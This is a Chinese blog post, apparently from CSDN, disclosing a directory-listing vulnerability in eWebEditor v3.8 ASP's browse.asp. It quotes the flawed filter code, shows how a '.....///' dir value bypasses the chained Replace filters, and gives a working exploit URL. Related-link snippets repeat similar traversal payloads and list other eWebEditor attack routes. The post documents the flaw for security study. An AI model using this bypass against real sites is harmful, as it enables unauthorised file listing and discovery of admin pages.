eWebEditor v3.8 ASP版列目录漏洞

最新推荐文章于 2021-03-11 13:48:30 发布
最新推荐文章于 2021-03-11 13:48:30 发布
阅读量856 收藏
点赞数
分类专栏: 漏洞收集 文章标签: eWebEditor

漏洞文件:asp/browse.asp
漏洞发生者:鬼哥
漏洞产生:

[php]
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
sCusDir = Trim(Request.QueryString("cusdir"))

Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), “|||”)
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next

If bValidStyle = False Then
OutScript(“alert(‘Invalid Style.’)”)
End If

sBaseUrl = aStyleConfig(19)
nAllowBrowse = CLng(aStyleConfig(43))
nCusDirFlag = Clng(aStyleConfig(61))

If nAllowBrowse <> 1 Then
OutScript(“alert(‘Do not allow browse!’)”)
End If
If nCusDirFlag <> 1 Then
sCusDir = “”
Else
sCusDir = Replace(sCusDir, “\”, “/”)
If Left(sCusDir, 1) = “/” Or Left(sCusDir, 1) = “.” Or Right(sCusDir, 1) = “.” Or InStr(sCusDir, “./”) > 0 Or InStr(sCusDir, “/.”) > 0 Or InStr(sCusDir, “//”) > 0 Then
sCusDir = “”
Else
If Right(sCusDir, 1) <> “/” Then
sCusDir = sCusDir & “/”
End If
End If
End If

sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> “/” Then
sUploadDir = “../” & sUploadDir
End If

Select Case sBaseUrl
Case “0″
sContentPath = aStyleConfig(23)
Case “1″
sContentPath = RelativePath2RootPath(sUploadDir)
Case “2″
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select

sUploadDir = sUploadDir & sCusDir
sContentPath = sContentPath & sCusDir

Select Case sType
Case “FILE”
sAllowExt = “”
Case “MEDIA”
sAllowExt = “rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov”
Case “FLASH”
sAllowExt = “swf”
Case Else
sAllowExt = “bmp|jpg|jpeg|png|gif”
End Select

sCurrDir = sUploadDir
sDir = Trim(Request(“dir”))
[/php]

'1.假设dir= ../
'2.假设dir=...//
'3.假设dir=.....///
        sDir = Replace(sDir, "\", "/")  '过滤1
        sDir = Replace(sDir, "../", "") '过滤2
'1.到这里就被过滤了
        sDir = Replace(sDir, "./", "") '过滤3
'2到这里也被功率了
'3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。


[php]
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
Else
sDir = ""
End If
End If

End Sub
[/php]

漏洞测试EXP:http://www.xxx.net/asp/browses.asp?style=gray&dir=…..///…..//  饶过过滤直接列根目录(只能列图片已目录)可用于找后台等(利用exp在页面不会显示出目录来,得查看源文件).

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
eWebEditor V12.0 for ASP 多语言商业版.rar
08-22
eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。...eWebEditor!...eWebEditor12.0中文商业版 (内置word导入等功能)
ewebeditor 5.2 目录漏洞
weixin_34162695的博客
01-03 161
利用方法如下 http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/.. 由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了. 嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了...
ewebeditor 3.8php漏洞,asp eWebEditor v3.8 目录漏洞
weixin_39599705的博客
03-11 147
好久没发洞了,今天搞个站遇到了asp eWebEditor v3.8随便挖掘了下,下面是成果,getshell的是没有,小洞还是发现了个!标题:asp eWebEditor v3.8 目录漏洞(其他版本为测试)漏洞文件:asp/browse.asp漏洞发生者:鬼哥漏洞产生:Sub InitParam()sType = UCase(Trim(Request.QueryString("type"...
ewebeditor漏洞目录遍历漏洞
weixin_33790053的博客
01-03 568
这里大概说一下!目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!这个文件有的不需要登陆验证,有些需要!很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!这种情况下,唯一可以利用的也就是利用遍历 目录功能查看网站文件,比如数据库路径、后台地址、其他的上...
ewebeditor 3.8php漏洞,eWebEditor v3.8 目录漏洞asp版本】
weixin_30299099的博客
03-11 102
标题:asp eWebEditor v3.8 目录漏洞(其他版本为测试)漏洞文件:asp/browse.asp漏洞产生:Sub InitParam()sType = UCase(Trim(Request.QueryString("type")))sStyleName = Trim(Request.QueryString("style"))sCusDir = Trim(Request.QueryS...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1148
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
eWebEditor V10.8 for ASP 多语言商业版 修改弹出窗口提示
02-16
**eWebEditor V10.8 for ASP 多语言商业版**是一款强大的在线HTML编辑器,专为ASP(Active Server Pages)平台设计。它提供了一种简单易用的界面,使得非技术人员也能轻松编辑网页内容,支持多种语言,极大地提高了...
eWebEditor V7.0 for Asp 可上传精简版
03-26
eWebEditor7文件夹放入网站里,不一定要在根目录;支持非IE浏览器,增加某些实用功能,修正多处已知BUG;上传文件接口设置了防止木马程序,过滤有害代码的功能。(2011年12月8日更新,如有错误或意见,欢迎联系...
eWebEditor V10.2 for ASP 多语言商业版
11-03
eWebEditor V10.2 for ASP 多语言商业版】 eWebEditor是一款流行的在线HTML编辑器,专为ASP(Active Server Pages)环境设计,适用于构建多语言网站。这款编辑器提供了丰富的文本编辑功能,使得非技术用户也能...
eWebEditor V10.7 for ASP 多语言商业版
09-23
eWebEditor V10.7 for ASP 多语言商业版】是一款强大的在线HTML编辑器,专为ASP(Active Server Pages)平台设计,提供多语言支持,使得网站内容编辑更加便捷高效。这款编辑器适用于各类网站后台管理系统,帮助...
php版ewebeditor 3.8的漏洞
weixin_34384915的博客
09-22 118
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法: 1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必 须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:aler...
ewebeditor遍历路径漏洞
HackCode的专栏
07-30 1268
 来源:Sebug.net eWebEditor 描述:eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。ewebeditor/admin_uploadfile.asp过滤不严,造成遍历路径漏洞 测试方法:[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
Ewebeditor 的一些漏洞总结
eldn__的专栏
06-23 9976
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。  对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:  默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),  NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb  默认的后台路径是admi
【Matlab仿真】资源useless,don‘t download
07-12
【Matlab仿真】资源useless,don‘t download
岗位述职报告PPT模板 (4)
07-12
【作品名称】:岗位述职报告PPT模板 (4) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
顾客购物数据.CSV(3900条记录)
最新发布
07-12
标题中的“客户购物偏好数据集 CSV(3900条记录)【500010051】”指的是一个包含3900条记录的CSV格式数据集,专门用于研究客户的购物偏好。CSV(Comma Separated Values)是一种常见的数据交换格式,易于处理并能被多种数据分析软件读取,如Excel、Python的pandas库等。这个数据集的编号为500010051,可能是一个特定项目或研究的一部分,便于管理和引用。 描述中提到,“本数据集包含与客户购物偏好相关的各种特征”,这暗示了数据集中可能存在多个,每个代表一种特征,例如客户的年龄、性别、购买频率、购买时间、产品类别、消费金额等。这些特征可以用来分析消费者的购买习惯、产品喜好、消费时段选择以及潜在的消费模式。企业可以通过分析这些数据来定制更精准的营销策略,提高客户满意度和销售额。 购物偏好数据集通常包括以下几个关键领域的知识点: 1. **客户基础信息**:如年龄、性别、地理位置、职业等,这些信息有助于理解不同群体的购物习惯。 2. **购买行为**:如购买频率、每次购物的平均消费、购买的产品种类等,可以揭示消费者的购物频次和消费水平
ACM(Association for Computing Machinery)国际大学生程序设计竞赛
07-12
ACM(Association for Computing Machinery)国际大学生程序设计竞赛
elasticsearch数据库使用案例.docx
07-12
Elasticsearch是一种分布式搜索和分析引擎,可以用于许多场景,以下是一些常见的使用案例:这些案例展示了Elasticsearch在不同领域的广泛应用,通过其强大的搜索和分析能力,可以帮助企业更高效地管理和利用数据。
前后端分离系统详细介绍
07-12
前后端分离系统详细介绍
ewebeditor for windows v15.4 商业版
02-07
ewebeditor for windows v15.4 商业版是一款专为Windows操作系统设计的网页编辑器软件。它具有强大的编辑功能和丰富的插件资源,能够满足开发者和网页设计师的需求。商业版的ewebeditor v15.4提供了更多的高级功能和技术支持,适合于企业和专业用户使用。 该版本的ewebeditor具有可视化的编辑界面,用户可以直观地设计和编辑网页内容,支持HTML、CSS、JavaScript等多种前端技术,能够快速实现网页的制作和美化。 此外,商业版的ewebeditor还提供了丰富的插件资源,如表格插件、多媒体插件、图表插件等,用户可以根据需要灵活添加和使用这些插件,扩展软件的功能和应用范围。 对于开发者和网页设计师来说,ewebeditor商业版还提供了更多的定制化功能和技术支持。用户可以通过自定义插件、主题皮肤等方式,打造属于自己的个性化编辑环境,提高工作效率和设计水平。 总之,ewebeditor for windows v15.4 商业版是一款功能强大、灵活定制、适用于企业和专业用户的网页编辑器软件,能够帮助用户快速高效地进行网页制作和设计,是Windows平台上的一款理想选择。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值